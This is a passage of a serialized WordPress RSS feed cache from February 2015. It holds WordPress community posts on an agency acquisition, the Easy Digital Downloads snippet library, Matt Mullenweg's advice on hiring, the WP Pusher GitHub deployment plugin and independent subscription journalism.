title=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\" href=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\">Sennza’s announcement</a>, talks of the acquisition began at WordCamp Europe in Sofia, Bulgaria.</p>\n<blockquote><p>Although we had met and spoken with Human Made previously, we got the chance to really meet and hang out with most of the team while at WordCamp Europe in Sofia, Bulgaria which helped to confirm this was the right decision to make.</p></blockquote>\n<p>Earlier this year at PressNomics, one of the topics of discussion is that we’re at the beginning stages of a consolidation period for agencies in the WordPress space. This move solidifies the belief that acquisitions involving 10 employees or less appear likely as larger shops look for opportunities to expand their reach and acquire talent at the same time.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 22:11:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: How a Crowdsourced Code Snippet Library Can Boost Your Open Source Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/how-a-crowdsourced-code-snippet-library-can-boost-your-open-source-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4387:\"<p>Roughly one year ago this month Pippin Williamson made the first commit to Easy Digital Download’s “<a href=\"https://github.com/easydigitaldownloads/library\" target=\"_blank\">Library</a>” repository on GitHub. He created the library to be a community-maintained repository of code snippets that modify the default behavior of Easy Digital Downloads.</p>\n<p>So far the library has received 113 commits from eight contributors, which has resulted in more than sixty code snippets available to users and developers. The snippets cover everything from modifying the checkout experience to customizing the plugin’s email notifications.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png\" rel=\"prettyphoto[37151]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png?resize=1025%2C951\" alt=\"edd-code-snippet-library\" class=\"aligncenter size-full wp-image-38381\" /></a></p>\n<p>With more than half a million downloads on <a href=\"https://wordpress.org/plugins/easy-digital-downloads/\" target=\"_blank\">WordPress.org</a> and 150+ free and commercial <a href=\"https://easydigitaldownloads.com/extensions/\" target=\"_blank\">extensions</a>, Easy Digital Downloads has a large community of developers who work with the software every day.</p>\n<p>Williamson said that having the ability to share snippets for modifying EDD behavior has been hugely useful for the project. He only approves solid, tested code but in most cases the snippets have been submitted by the EDD team. Managing the repository hardly costs any time at all, “a few minutes per week at max,” he said.</p>\n<p>The benefits of hosting a community-maintained repository of code snippets far outweigh the minimal time required to maintain it. “The biggest problem it has is humans: we tend to forget to put snippets up a lot of times,” Williamson said. He identified three key areas where the library benefits the project:</p>\n<ul>\n<li>It’s a resource for the support team.</li>\n<li>It’s a source of examples for people wanting to customize behavior.</li>\n<li>It provides live testing (similar to add-on plugins) for potential features to add to core.</li>\n</ul>\n<p>The most common way that snippets are added to the EDD library is through the support staff. “We write code snippets for customers while helping with support tickets and then we put the snippet in the library,” Williamson said.</p>\n<p>He hasn’t seen any WordPress-based open source projects or products doing anything similar but thinks that others could gain some value from implementing a library. GenerateWP might be the closest example of a site attempting something similar for snippets that extend WordPress core, with its new user <a href=\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\" target=\"_blank\">code library feature</a>. However, this doesn’t have the collaborative benefits of hosting the library on GitHub.</p>\n<p>Larger WordPress projects like the Pods Framework, Gravity Forms, WooCommerce, BuddyPress, Jetpack, etc., are prime candidates that might benefit from a library of tested snippets. Of course, it helps that the base EDD plugin is free and open source. A 100% commercial project may not fare as well with a crowdsourced snippet library.</p>\n<p>Easy Digital Download is well known for being extensible and developer-friendly. Over the past two years <a href=\"http://wptavern.com/pippin-williamson-on-building-a-community-around-your-open-source-project\" target=\"_blank\">Williamson built a community of contributors</a> 120+ strong and found that extensibility has a direct correlation to profitability. The code snippet library is undoubtedly a valuable investment toward helping developers extend the base EDD plugin.</p>\n<p>Could your open source project or product benefit from a community-maintained library of code snippets? A snippet library can keep developers from having to reinvent the wheel when performing common modifications. It also provides a tested resource of code samples for those who are just getting started extending your project. If Williamson’s experience is any proof, then the few minutes per week spent on a snippets library can pay off with a big boost for the community surrounding your project.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 20:12:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Advice and Fallacies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44648\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/advice-and-fallacies/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5955:\"<p>One of the toughest things in business is when you get well-meaning advice from advisors, investors, or friends of the company who are valuable but might hold some ideas or ways of approaching problems that just aren’t applicable to your particular company or situation. They might be right most of the time, and it might have worked for them in the past to build a huge success, but it doesn’t mean it’s right for you, right now.</p>\n<p>This is especially a struggle for Automattic because so much of what we do is deliberately different from companies that have come before us. The below is a sensitive-info-scrubbed version of a comment I made on an <a href=\"http://p2theme.com/\">internal P2</a> in response to someone who had met with a close friend of the company who had said we should “hire more business people, and more people like <em>so-and-so</em>, who have a background in and passion for data analysis and structure. He also shared his ideas about what the additional business hires could be responsible for, such as P&L responsibilities for specific products.” The person he had talked to was asking why we weren’t following that advice.</p>\n<p>The first part was easy, because <em>so-and-so</em> was actually leading hiring for a position around data and the early results were going well. The rest I ended up writing more about, which follows. It was only meant for internal consumption, so read it as such, but I got enough requests to share the comment publicly that I wanted to clean it up and release it for y’all.</p>\n<blockquote><p>On the “more biz people + P&L” side, it’s an area we disagree.</p>\n<p>We’ve had more “business people” in the past, and found it just didn’t move the needle in the same way that investing on the support, engineering, and design side did. They also tended to generate more meetings and work for other people than was commensurate for their contributions.</p>\n<p>We’ve also experimented with giving leads P&L responsibility for products and groups, but ultimately it was awkward because we don’t really want leads or teams focused on the loss or costs of what they’re doing — we just want to grow our core metrics and revenue in a healthy and accelerating way, and let Ops and myself worry about overall profit or loss for the company, costs of people and services, capital requirements, etc. We’re still at a stage where our primary goals are investing in growth and product excellence, I wouldn’t want a P&L concern to be a distraction from that, and that also takes us into the territory of different teams having “headcounts” of people they can hire for the year, or budgets set ahead of time and that they’ll lose if they don’t use, zero-sum accounting between teams and more balkanization you often see in larger organizations. When anyone thinks about P&L at Automattic, I want it to be holistically and with a long-term view, not for a single team or product.</p>\n<p>It gets backs to the fallacy we talked about and agreed to avoid at the [WordPress.com leads] meetup, which is the business equivalent of <a href=\"http://en.wikipedia.org/wiki/Great_Man_theory\" rel=\"nofollow\">Great Man Theory</a>: the idea that a deficiency in the business or product will be solved by hiring someone senior to be in charge of that thing. Example: Automattic is bad at marketing, we should hire a CMO. (99% of the time when this is suggested it means an external person, because if anyone internal was good the problem wouldn’t exist.) It’s an easy thing for anyone to fall into, you can see it in [a recent internal thread].</p>\n<p>This must work sometimes, because it seems to be a near-universal affliction of VCs on startup boards. It also is a little bit of a <a href=\"http://bikeshed.com/\" rel=\"nofollow\">bikeshed</a>, because while it can be difficult to understand or feel like you can have an influence on something fundamental to the product, like say the signup flow, most VCs have large professional networks and can have long and vigorous discussions talking about potential people who are executives in a given area and their first or second degree connections to them. Of course, like many of us, VCs are consumers of tech media which tends to ascribe all the success of an organization to a single person (like Sheryl Sandberg for Facebook not falling apart, or Adam Bain for revenue at Twitter). However often the problem has root causes more fundamental than a single person could shift.</p>\n<p>I subscribe to a more environment-driven approach, that if you break down a problem into its component parts you can address them individually, often with relatively simple next steps, and build things from the ground up, rather than the top down. If you can’t do that, then it’s best to be candid that the area is not a priority and make sure that’s in line with what you’re focusing on instead. In this process leaders will emerge or if the effort matures to a point where one joins as a new hire he or she will have the resources, groundwork, and environment to succeed.</p></blockquote>\n<p><strong>So in summary: always go back to first principles of decisions.</strong> Hires are seldom panaceas. Someone being successful in a role at another company doesn’t mean they actually did the work, or were the cause of the success. If there’s an area you’re weak, try to figure out the root causes of why you’re weak, and where possible try to improve the environment that creates the problem before pinning the turnaround on a “Jesus hire.” When you improve the environment it makes it much more likely a new external hire will do well. The majority of success or failure is a result of the environment, at least as much as the individuals involved.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 07:57:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WP Pusher Aims to Provide Pain-Free Deployment of WordPress Themes and Plugins from GitHub\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38339\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://wptavern.com/wp-pusher-aims-to-provide-pain-free-deployment-of-wordpress-themes-and-plugins-from-github\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6728:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher.png?resize=680%2C312\" alt=\"wp-pusher\" class=\"aligncenter size-full wp-image-38342\" /></a></p>\n<p>If you create plugins and themes for clients and host them on GitHub, then you may have encountered the hassle of having to move those files over to your client’s installation. On super cheap hosting packages, where SSH access is not an option, this process inevitably requires manually copying files over via FTP.</p>\n<p>This is the problem that Danish developer <a href=\"http://petersuhm.com/\" target=\"_blank\">Peter Suhm</a> aims to solve with his new <a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> product. The plugin aims to bring pain-free deployment of WordPress themes and plugins directly from GitHub and Bitbucket.</p>\n<p>“If you happen to be an actual developer, I guess you have a few preferences as to how you manage and deploy your code,” Suhm said. “I’m talking about stuff like version control and automated deployment scripts. Good luck with that on your clients’ cheap-ass shared hosting account.”</p>\n<p>Suhm developed WP Pusher with the vast majority of cheaply-hosted WordPress sites in mind. Additionally, he wanted to eliminate some of the hangups with more expensive hosts. “Even if you are running a shiny new VPS and have SSH access, Git installed and you think all is well, soon you’ll realize other weird things,” he said. “You can’t have symlinks in your /plugins folder just to mention one.” WP Pusher gets around these limitations via a simple plugin that does not require Git or SSH.</p>\n<h3>How Does WP Pusher Work?</h3>\n<p>Once installed, WP Pusher allows you to install and manage all of your GitHub or Bitbucket-hosted plugins in one central dashboard in the admin. Enabling the Push-to-Deploy feature will have your code update itself automatically every time you push to GitHub or Bitbucket.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/manage-wp-pusher-themes.png?resize=1025%2C202\" alt=\"manage-wp-pusher-themes\" class=\"aligncenter size-full wp-image-38352\" /></a></p>\n<p>The plugin supports private repositories in its free edition and includes support for branches in the <a href=\"https://wppusher.com/#licenses\" target=\"_blank\">Pro version</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png\" rel=\"prettyphoto[38339]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/wp-pusher-install-plugin.png?resize=1025%2C651\" alt=\"wp-pusher-install-plugin\" class=\"aligncenter size-full wp-image-38353\" /></a></p>\n<p>WP Pusher is essentially an extension of the built-in auto updater in WordPress, which Suhm explained in the plugin’s release <a href=\"http://blog.wppusher.com/pain-of-wordpress-development/\" target=\"_blank\">post</a>:</p>\n<blockquote><p>After a lot of prototyping, and hacking around with the WordPress core, we came up with a smart solution. By utilizing the WordPress core upgrader classes, we could solve the problem in a really clean way. </p>\n<p>Since WordPress already knows how to pull stuff from a remote source and install it, we realized that by working together with WordPress, instead of just throwing random automated SSH and FTP scripts at the server, we could just have WordPress do the work for us -with a lot of tweaking of course. In the end, our solution doesn’t do anything that is not native to WordPress. It’s all core functionality.</p></blockquote>\n<p>WP Pusher does everything in the plugin and does not require shell access. It communicates with GitHub via a token stored on your server and operates using WordPress’ core updater capabilities.</p>\n<h3>Different Approaches to Managing WordPress Projects with Git</h3>\n<p>In order to use WP Pusher, each GitHub-hosted plugin and/or theme will need to be in its own repository. While beta testing WP Pusher, Suhm found that developers have <a href=\"http://blog.wppusher.com/managing-wordpress-projects-with-git/\" target=\"_blank\">differences in how they manage WordPress projects with Git</a>. The most common one he’s encountered is <em>one installation, one repository</em>, where the entire WordPress installation, including themes and plugins, is under Git control. Suhm believes that this approach is fundamentally broken, given that it requires you to keep a lot of 3rd party code under version control.</p>\n<p>WP Pusher operates under a “<em>one package, one repository</em>” approach where each theme or plugin is its own entity. This method also offers the advantage of being able to share theme/plugin code across multiple projects.</p>\n<p>“WordPress relies heavily on the auto updater, which would make your version control a mess,” Suhm explained. “If you do have something that is more enterprise than most WordPress setups, you should consider a custom setup that allows better for version control of core. Packages should still, in my opinion, each have their own repositories, since they are logically their own entities.”</p>\n<p>WP Pusher is structured around this approach for managing WordPress projects with Git. You may need to restructure some of your repositories if you want to be able to use the plugin.</p>\n<p>The free version offers unlimited themes and plugins, unlimited repositories, and support for both GitHub and Bitbucket. It does not, however, include email support. WP Pusher is compatible with WordPress multisite and will show up in the network admin when activated. It doesn’t currently support Composer but Suhm is <a href=\"https://twitter.com/WP_Pusher/status/558356082960371713\" target=\"_blank\">considering adding it in the future</a>. The plugin is released under the GPLv2 license.</p>\n<p><a href=\"https://wppusher.com/\" target=\"_blank\">WP Pusher</a> offers a unique take on maintaining version control for projects while not forcing WordPress to bend over backwards to provide it in the admin. It leaves the version control to GitHub and/or Bitbucket and uses WordPress simply for deployment.</p>\n<p>Setup is simple and the plugin will work virtually everywhere, even on the cheapest hosting. If you like the idea of maintaining version control on a plugin/theme basis, you can download the WP Pusher plugin for free from the project’s <a href=\"https://wppusher.com/\" target=\"_blank\">website</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:32:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Post Status: New journalism\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8311\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://poststatus.com/new-journalism/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13584:\"<p>Have you heard of Andrew Sullivan? He’s the man behind The Dish — a blog that helped break new ground on blog monetization through membership fees.</p>\n<p><a href=\"http://dish.andrewsullivan.com/2015/01/31/a-note-to-my-readers/\">He quit blogging</a>, and therefore the media world declared blogging dead (again). Sullivan leaving and the posts that have come from it have caused me to think about blogging and journalism in its current and changing state. I think we’re in the second act of what I’m pompously calling <em>new journalism</em>.</p>\n<h3>Blogging is so (not) dead</h3>\n<p>Seemingly everyone in media weighed in on Sullivan’s departure, from <a href=\"http://www.buzzfeed.com/bensmith/this-is-my-blog\">Ben Smith</a> at Buzzfeed to <a href=\"http://www.vox.com/2015/1/30/7948091/andrew-sullivan-leaving-blogging\">Ezra Klein</a> at Vox. My favorite (until today) was Mathew Ingram’s <a href=\"https://gigaom.com/2015/01/31/blogging-is-very-much-alive-we-just-call-it-something-else-now/\">take at Gigaom</a>, which mostly defended the blog.</p>\n<p>But the best of the bunch goes to former Automattician and current independent tech journalist Ben Thompson. Ben runs <a href=\"http://stratechery.com/\">Stratechery</a>, a blog that has a very similar model to The Dish (and my own), where he makes money from subscribers who get extra members-only content.</p>\n<p>I have followed Ben’s work closely. I was quite keen to see how his model would work for him, and it has. Nevertheless, I almost fully agree with Ben’s take on what Sullivan’s model and departure mean:</p>\n<blockquote><p>It turns out, though, that there are more business models than simply advertising, as Sullivan himself sought to show. Sullivan was, for the last two years, supported by reader subscriptions to the tune of <a href=\"https://gigaom.com/2014/10/10/andrew-sullivans-daily-dish-sees-new-signups-fall-but-revenue-holding-steady-at-about-1m/\">nearly one million dollars a year</a>, and while many were skeptical of Sullivan’s efforts when he started, his ability to raise money shouldn’t have been a surprise: his is a singular voice – to put it in economic terms, Sullivan’s writing had a low <a href=\"http://en.wikipedia.org/wiki/Elasticity_of_substitution\">elasticity of substitution</a> – so people were happy to pay for something they couldn’t get anywhere else.</p></blockquote>\n<p>Elasticity of substitution may be my new favorite phrase. And in that concept, I think we find the important key to viability. What are we valuing in websites? For me, it’s individual voices.</p>\n<p>A bit more from Ben’s post:</p>\n<blockquote><p>But Sullivan did have a viable business, and it scaled wonderfully: it cost him the same amount of both time and money to serve 1,000 subscribers as it would have to serve 100,000, or 1 million, and he didn’t need to change a thing about himself or his content to do it. No, it’s not scale that is the problem, but rather <em>reach.</em></p>\n<p>I am, of course, acutely aware that there is a tradeoff when it comes to the subscription business model: by making something scarce, and worth paying for, you are by definition limiting your number of readers.<span> </span>Stratechery, though, serves a niche, and <a href=\"http://stratechery.com/2015/niches-problem-subscription-services/\">niches are best served</a> by making more from customers who really care than from milking pennies from everyone.</p></blockquote>\n<p>For a writer, it is a difficult mind-shift to focus on subscribers after years of focusing on reach. But I do think a subscriber model, or more likely a hybrid subscriber model, is perhaps one of the most viable routes for sustainable journalism that we have today.</p>\n<h3>New blogging mediums</h3>\n<p>Of additional interest to all of these “blogging is dead” posts, is how the writers define blogs and the mediums for them.</p>\n<p>Ben really narrows the definition of a blog.</p>\n<blockquote><p>A big problem with this entire discussion is that there really isn’t a widely agreed-upon definition of what a blog is, thanks in part to the rise of sites like TechCrunch that ran on WordPress and presented posts in reverse-chronological order and so, at least in the beginning, were called “blogs”; add to that the thinly-disguised PR-channels known as “company blogs” and it’s easy to get confused.</p>\n<p>And so, to be clear, when I speak of the “blog” I am referring to a regularly-updated site that is owned-and-operated by an individual (there is, of course, the “group blog,” but it too has a clearly-defined set of authors). And there, in that definition, is the reason why, despite the great unbundling, the blog has not and will not die: is is the only communications tool, in contrast to every other social service, that is <em>owned</em> by the author; to say someone follows a blog is to say someone follows a <em>person.</em></p></blockquote>\n<p>This is probably the single argument I (partially) disagree with. I actually believe that a blog is just that: <em>a web log</em>. I think it’s perfectly fine to consider Twitter, Facebook, & Instagram new mediums for blogging — at least in the sense of the traditional <em>web log</em> definition. They are just for a different form of blogging: short form, temporary, and a viable replacement for the “10 to 15″ daily update style of posts many old school bloggers previously put on their primary “blogs”.</p>\n<p>Other than someone abusing these mediums — for instance, Marc Andreessen’s tweet-storms — our WordPress (or other software) blogs are still where our more permanent thoughts go. And fortunately, as Ben notes, we have these short-form mediums as free marketing channels for our actual blogs and more serious thoughts.</p>\n<p>Ben also hesitates to consider multi-author sites as blogs. I disagree here as well. Perhaps publications aren’t blogs as a whole, but within TechCrunch or The New York Times, individuals rise up with their own unique voices, and those singular feeds are, in my opinion, blogs of their own — whether or not they are fully siloed within the publication. I can follow an author on Twitter and essentially get their blog feed through their Twitter links, even if the site itself doesn’t differentiate their posts from anyone else’s.</p>\n<p>So Ben has helped me establish a new mental constraint for defining a blog: <strong>a blog is a highly individual thing</strong>. I have never truly considered this before, but it makes sense. I’ve always been most attracted to publications where the voice behind the writing is strong — where I know who is writing a post whether I see the byline or not.</p>\n<h3>Publishing containers</h3>\n<p>The New York Times, TechCrunch, Politico and BuzzFeed: these are containers. They may have some over-arching styles that most of their writers follow, but we still get to know individuals in these publications. I know David Carr’s voice at The New York Times; I know Alexia Tsotsis’ voice at TechCrunch; I know Mike Allen’s voice at Politico; and I know Ben Smith’s voice at BuzzFeed.</p>\n<p>One thing we’ve seen happen in a wake of <em>new journalism</em> is that a voice gets too big for the container, and the voice splits. Nate Silver left The New York Times. Ezra Klein left The Washington Post. Interestingly, I think both of these guys lost their voices a bit when they created their own containers.</p>\n<p>Andrew Sullivan is a great example of a big voice within publishing containers. Before he went independent, he was a huge voice at The Atlantic and The Daily Beast. He was apparently responsible for <a href=\"http://www.forbes.com/sites/jeffbercovici/2011/05/03/losing-andrew-sullivan-didnt-hurt-the-atlantics-traffic/\">up to a quarter</a> of all traffic to The Atlantic before he left.</p>\n<p>For a publisher, this should be both exhilarating and terrifying. The voice within your publication (Sullivan) gets outstanding results, but you also run the risk of the voice leaving; if the voice is bigger than the container, that could be really really bad.</p>\n<h3>We need new tools for a new kind of publishing container</h3>\n<p>Journalists are leaving big publishing containers and going independent for a variety of reasons, but I believe one is pretty clear: money.</p>\n<p>A niche publisher like Ben Thompson can make well into six-figures running his own publication. Ben is a talented and knowledgeable writer, but I don’t think it would be easy for him to make the kind of money he’s making at Stratechery if he were writing for a traditional publication.</p>\n<p>Ben cites the ease of use of tools like WordPress and Stripe as reasons to be optimistic that the independent subscription model can work:</p>\n<blockquote><p>While WordPress has long been an effective free option for managing the content-side of blogging, only recently are there useful tools for managing the business-side. First and foremost amongst these is Stripe which, for the first time makes managing subscription-payments simple and straight-forward. However, there are still holes, particularly when it comes to actually managing membership lists and communities</p></blockquote>\n<p>I agree that it’s easier than before, but I wouldn’t say it’s simple. I’ve spent a great deal of time to make Post Status work behind the scenes, and I don’t think it’s perfect by any means. Is it cheap compared to million dollar big-publisher platforms? Yes. Is it cheap for a solo-journalist? Not at all.</p>\n<p>I think there is a tremendous opportunity here: there is room to create new publishing containers (I’m not sure if this should be a tool or a network) that lower the technical barrier to entry but also enable independent, subscription-based journalism.</p>\n<p>Big media companies remove the need to manage the business and technical side for journalists. Meanwhile, those of us that are attempting our own thing are all reinventing the wheel a bit.</p>\n<p>Ben and I use some of the same tools — WordPress and Stripe — but what if there was a more structured container for those seeking independence and someone to help them take care of the non-content aspects? What if that same tool had its own network effect?</p>\n<h3>Who is in position to be a new kind of container?</h3>\n<p>What existing networks are in position to offer this kind of tool? WordPress.com is one. Medium is another.</p>\n<p>I envision a tool (publishing platform) where independent journalists can do a few things:</p>\n<ul>\n<li>Maintain their own audience (be a part of a network, but be their own voice and publication)</li>\n<li>Own their own brand (custom themes/styles, unique domain)</li>\n<li>Offer subscription options to readers without managing the tech</li>\n</ul>\n<p>If I were Ev Williams or Matt Mullenweg, I’d be working on a way to be the next container for great, <em>sustainable</em> journalism. And hosted networks have a unique advantage: they can offer discovery for new or lesser-known authors. Unless <a href=\"https://poststatus.com/notes/recommendation-engine-independent-wordpress-blogs/\">self-hosted options figure that part out</a>.</p>\n<p>As a publisher on the WordPress.org side of things, I don’t think the perfect tool exists yet either. Fortunately I’m able to build most of what I need. But Ben is right that managing membership lists and communities with WordPress is still hard. Syncing the membership list and the email list (delivery mechanism) is hard too.</p>\n<p>While I don’t think the perfect self-hosted tools exist quite yet, I believe it’s just a matter of time. But even the best self-hosted tool will require that the journalist also manage the business elements; therefore I think there will always be room for a hosted tool.</p>\n<p>I think this could be an excellent business vertical for a publishing tool like <a href=\"http://wordpress.com\">WordPress.com</a> or <a href=\"http://medium.com\">Medium</a>.</p>\n<h3>New journalism</h3>\n<p>I’ve used the words <em>journalism</em> and <em>blogging</em> synonymously throughout this post. I don’t think all bloggers are journalists, but I do think all journalists are bloggers. Blogging isn’t dead. I think it’s just leaving adolescence.</p>\n<p>Journalists won’t need big media to back their efforts. They’ll be able to use a blend of mediums (Twitter, Instagram, Youtube, etc) to funnel traffic to their main “blog” — or primary domain — where they can actually make money by attracting loyal subscribers willing to pay for high-value content.</p>\n<p>The formula for making money will change. The key for successful independent journalism won’t be about being first, or dominating search, or pageview quotas. Too many in big media have ignored that <em>elasticity of substitution</em> measurement Ben highlights.</p>\n<p>Journalism is changing, and I agree with Ben Thompson that “The Daily Dish will in the long run be remembered not as the last of a dying breed but as the pioneer of a new, sustainable journalism.”</p>\n<p>Those journalists that can create what others cannot will have a formula for publishing success, and soon enough the tools will catch up to allow them to do what they do best: create great content.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 22:21:23 